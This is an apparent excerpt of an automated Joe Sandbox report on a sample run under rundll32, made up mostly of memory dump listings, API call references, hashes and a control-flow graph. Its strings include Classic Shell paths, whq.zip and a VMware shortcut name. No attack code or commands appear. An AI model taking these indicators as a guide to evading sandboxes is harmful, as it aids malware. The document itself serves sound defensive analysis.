                          • C:\Program Files\Classic Shell\whq.zip, xrefs: 00816004
                          • \VMware Workstation.lnk, xrefs: 00815F58
                          • C:\Program Files\Classic Shell\cache, xrefs: 00815FC5, 00815FD7
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2901146485.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2901089143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901146485.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901792198.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901842033.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901894617.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901936209.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902012564.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902062195.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902148715.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902204151.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902238115.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902273884.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902308536.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902345989.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902402196.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902442956.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902480411.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902517959.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902557624.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902603807.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902642131.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902685693.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902727325.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902771042.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902816012.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902857796.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902901610.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902943399.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903004148.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903047347.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903092323.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903138276.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903289649.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903331628.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903372313.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903416510.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903459554.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903510167.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: AttributesFileMessageSleep
                          • String ID: 78E2EA2D09306A8E4A8449A17700DF32552EBEFB77AC3717BD2C51BE359B53EC181830EB04550D33587B2E0329D21F279182D7E2FDCD044A89361634CAF375101F$C:\Program Files\Classic Shell$C:\Program Files\Classic Shell\cache$C:\Program Files\Classic Shell\whq.zip$\VMware Workstation.lnk
                          • API String ID: 2390311571-3073936675
                          • Opcode ID: 129142bfb51975e8b592fb8c9b1c301ee2532256d8dbf39388386f8aeb2b2ad8
                          • Instruction ID: 9cd3db94755c139ddff007fdf6a470e84e12c6dbf9b29939154e8315843d076e
                          • Opcode Fuzzy Hash: 129142bfb51975e8b592fb8c9b1c301ee2532256d8dbf39388386f8aeb2b2ad8
                          • Instruction Fuzzy Hash: 79317331200E05D4EB10EF72D8A13D92725FF9479CF805116FA8E976A5EF79C589C394
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • LeaveCriticalSection.KERNEL32 ref: 00414771
                          • EnterCriticalSection.KERNEL32 ref: 00414847
                          • LeaveCriticalSection.KERNEL32 ref: 00414880
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2901146485.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2901089143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901146485.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901792198.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901842033.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901894617.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901936209.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902012564.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902062195.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902148715.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902204151.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902238115.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902273884.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902308536.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902345989.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902402196.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902442956.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902480411.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902517959.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902557624.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902603807.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902642131.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902685693.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902727325.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902771042.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902816012.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902857796.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902901610.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902943399.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903004148.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903047347.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903092323.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903138276.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903289649.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903331628.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903372313.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903416510.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903459554.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903510167.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalSection$Leave$Enter
                          • String ID:
                          • API String ID: 2978645861-0
                          • Opcode ID: 81552ea04b8f0d4334cc7bdf6af72e2620360f65341830c32bae4a6db5f01a9f
                          • Instruction ID: 56c173e72efaabb3100106b86f381f207646cefe1b26b91f93a20514a2ca776e
                          • Opcode Fuzzy Hash: 81552ea04b8f0d4334cc7bdf6af72e2620360f65341830c32bae4a6db5f01a9f
                          • Instruction Fuzzy Hash: 39411D65210A5088DB10EF72D4913E92722EB84B9CF85A127FB4E87AA9DF7CC5C5C358
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 113 436960-436983 call 411140 GetFileAttributesW 116 436989-436991 113->116 117 436a4e-436a56 GetLastError 113->117 120 436993-43699d 116->120 121 4369a2-4369a4 116->121 118 436a79-436a7c 117->118 119 436a58-436a5b 117->119 122 436a81-436a8d 118->122 119->118 123 436a5d-436a63 119->123 120->122 124 4369a6-4369db CreateFileW 121->124 125 4369f8-4369fe 121->125 123->118 128 436a65-436a68 123->128 124->122 129 4369e1-4369f3 CloseHandle 124->129 126 436a00-436a03 125->126 127 436a05-436a3a call 420600 125->127 126->122 134 436a49-436a4c 127->134 135 436a3c-436a47 call 420550 127->135 128->118 131 436a6a-436a6d 128->131 129->122 131->118 133 436a6f-436a72 131->133 133->118 136 436a74-436a77 133->136 134->122 135->122 136->118 137 436a7e 136->137 137->122
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2901146485.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2901089143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901146485.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901792198.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901842033.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901894617.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901936209.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902012564.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902062195.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902148715.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902204151.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902238115.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902273884.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902308536.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902345989.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902402196.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902442956.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902480411.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902517959.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902557624.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902603807.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902642131.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902685693.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902727325.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902771042.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902816012.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902857796.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902901610.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902943399.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903004148.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903047347.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903092323.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903138276.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903289649.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903331628.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903372313.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903416510.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903459554.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903510167.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: File$AttributesCloseCreateErrorHandleLast
                          • String ID:
                          • API String ID: 2927643983-0
                          • Opcode ID: 45c71b4b7f66cbdff86984d3ecc73382b56bdf5e258aa0ca66effcb3267f1f5a
                          • Instruction ID: 98a77ccf81b0bcca3246d0e759f0e6111a319c85e2d8d3d3e5bdc5a1946655a4
                          • Opcode Fuzzy Hash: 45c71b4b7f66cbdff86984d3ecc73382b56bdf5e258aa0ca66effcb3267f1f5a
                          • Instruction Fuzzy Hash: BF216832B0821322E630B5A9A46475B1861578F7B8F2AF70FEC695B3D5CA7CCD81178D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetSystemDefaultUILanguage.KERNEL32 ref: 004154B7
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2901146485.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2901089143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901146485.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901792198.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901842033.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901894617.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901936209.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902012564.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902062195.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902148715.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902204151.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902238115.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902273884.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902308536.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902345989.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902402196.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902442956.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902480411.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902517959.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902557624.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902603807.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902642131.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902685693.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902727325.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902771042.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902816012.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902857796.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902901610.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902943399.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903004148.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903047347.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903092323.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903138276.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903289649.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903331628.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903372313.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903416510.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903459554.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903510167.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: DefaultLanguageSystem
                          • String ID:
                          • API String ID: 4166810957-0
                          • Opcode ID: 97b19cd40701ddebf6783f0beb1e79e79877712c282ebd63ac355bdf4c4110e4
                          • Instruction ID: bb2f8fdc298b904da0d8311a6692b3c5818f4a7b9ef0247cd5b56ed5edd11b73
                          • Opcode Fuzzy Hash: 97b19cd40701ddebf6783f0beb1e79e79877712c282ebd63ac355bdf4c4110e4
                          • Instruction Fuzzy Hash: A651B576210B8089DB20EF76D8953D92762FB8479CF905427EA0D8BB59DF78C9C5C384
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32 ref: 004155BB
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2901146485.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2901089143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901146485.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901792198.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901842033.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901894617.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901936209.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902012564.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902062195.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902148715.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902204151.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902238115.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902273884.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902308536.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902345989.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902402196.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902442956.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902480411.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902517959.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902557624.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902603807.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902642131.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902685693.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902727325.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902771042.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902816012.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902857796.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902901610.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902943399.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903004148.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903047347.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903092323.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903138276.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903289649.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903331628.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903372313.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903416510.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903459554.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903510167.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: FileModuleName
                          • String ID:
                          • API String ID: 514040917-0
                          • Opcode ID: d11a0e43b40b78acf69311fe5df8e6df2ec459576eda087bd5762c40fa154f83
                          • Instruction ID: 501e22f373f49a8995146b0ee06b89f1180c0e2900e8ccb6f530d303bba059fa
                          • Opcode Fuzzy Hash: d11a0e43b40b78acf69311fe5df8e6df2ec459576eda087bd5762c40fa154f83
                          • Instruction Fuzzy Hash: 8B111532220A5098DB20EFB6C8957DA2765E7487CCF51202AFA4E47B99DF79C189C394
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • Sleep.KERNEL32 ref: 0080F91E
                            • Part of subcall function 00813C90: Sleep.KERNEL32 ref: 00813CAC
                            • Part of subcall function 00813C90: Sleep.KERNEL32 ref: 00813CC5
                          • Sleep.KERNEL32 ref: 0080F98C
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2901146485.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2901089143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901146485.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901792198.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901842033.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901894617.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901936209.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
